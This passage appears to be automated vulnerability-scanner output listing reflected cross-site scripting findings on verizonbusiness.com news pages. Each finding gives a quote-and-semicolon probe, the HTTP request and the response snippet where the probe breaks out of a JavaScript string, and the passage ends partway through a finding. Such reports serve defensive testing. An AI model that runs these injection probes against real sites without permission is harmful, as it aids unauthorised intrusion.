1.434. http://www.verizonbusiness.com/about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25641-en-Verizon+Unveils+VERIS+Information+Sharing+Website+to+Advance+Knowledge+of+Security+Incidents.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bc95'%3b2cd07d6e394 was submitted in the REST URL parameter 3. This input was echoed as 4bc95';2cd07d6e394 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/4bc95'%3b2cd07d6e394 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:34 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/news/4bc95';2cd07d6e394'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.435. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a875d'%3b99415106e64 was submitted in the REST URL parameter 1. This input was echoed as a875d';99415106e64 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /abouta875d'%3b99415106e64/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40922
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/abouta875d';99415106e64/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml'.toLowerCase().replace(/_/,'/');
v
...[SNIP]...

1.436. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb9e5"%3b9c7c8a3de80 was submitted in the REST URL parameter 1. This input was echoed as bb9e5";9c7c8a3de80 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutbb9e5"%3b9c7c8a3de80/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:47:39 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40922
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/aboutbb9e5";9c7c8a3de80/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml";

hbx.pndef="title";//DEFAULT PAG
...[SNIP]...

1.437. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21736'%3be06083264ed was submitted in the REST URL parameter 2. This input was echoed as 21736';e06083264ed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news21736'%3be06083264ed/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47383
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/news21736';e06083264ed/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml'.toLowerCase().replace(/_/,'/');
var ru
...[SNIP]...

1.438. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54486"%3b47c476f6ab4 was submitted in the REST URL parameter 2. This input was echoed as 54486";47c476f6ab4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news54486"%3b47c476f6ab4/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47385
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news54486";47c476f6ab4/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml";

hbx.pndef="title";//DEFAULT PAGE NAM
...[SNIP]...

1.439. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c48af'%3b06b2f34cc8b was submitted in the REST URL parameter 3. This input was echoed as c48af';06b2f34cc8b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/c48af'%3b06b2f34cc8b HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/c48af';06b2f34cc8b'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.440. http://www.verizonbusiness.com/about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25642-en-Verizon+Introduces+New+Mobile+Services+Enablement+Platform+to+Help+Businesses+Develop,+Mobilize,+Manage+Applications+Across+a+Global+Enterprise+.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c13c"%3bcc12e40f49 was submitted in the REST URL parameter 3. This input was echoed as 5c13c";cc12e40f49 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/5c13c"%3bcc12e40f49 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:57 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/5c13c";cc12e40f49";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.441. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3a34"%3bfb291d20a22 was submitted in the REST URL parameter 1. This input was echoed as e3a34";fb291d20a22 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboute3a34"%3bfb291d20a22/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:29 GMT
Content-Type: text/html
Content-Length: 40794
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/aboute3a34";fb291d20a22/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PA
...[SNIP]...

1.442. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be552'%3b4ef65abbe38 was submitted in the REST URL parameter 1. This input was echoed as be552';4ef65abbe38 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutbe552'%3b4ef65abbe38/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:38 GMT
Content-Type: text/html
Content-Length: 40792
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/aboutbe552';4ef65abbe38/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.
...[SNIP]...

1.443. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a86a"%3bcdb276b3d13 was submitted in the REST URL parameter 2. This input was echoed as 3a86a";cdb276b3d13 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news3a86a"%3bcdb276b3d13/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:47:50 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 47253
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news3a86a";cdb276b3d13/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VA
...[SNIP]...

1.444. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f04a'%3b55d58441ffc was submitted in the REST URL parameter 2. This input was echoed as 9f04a';55d58441ffc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news9f04a'%3b55d58441ffc/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:11 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47253
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news9f04a';55d58441ffc/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.lengt
...[SNIP]...

1.445. http://www.verizonbusiness.com/about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25643-en-Cloud+Strategies,+Economy+Continue+to+Underscore+Top+Technology+Trends+for+2011.xml

Issue detail

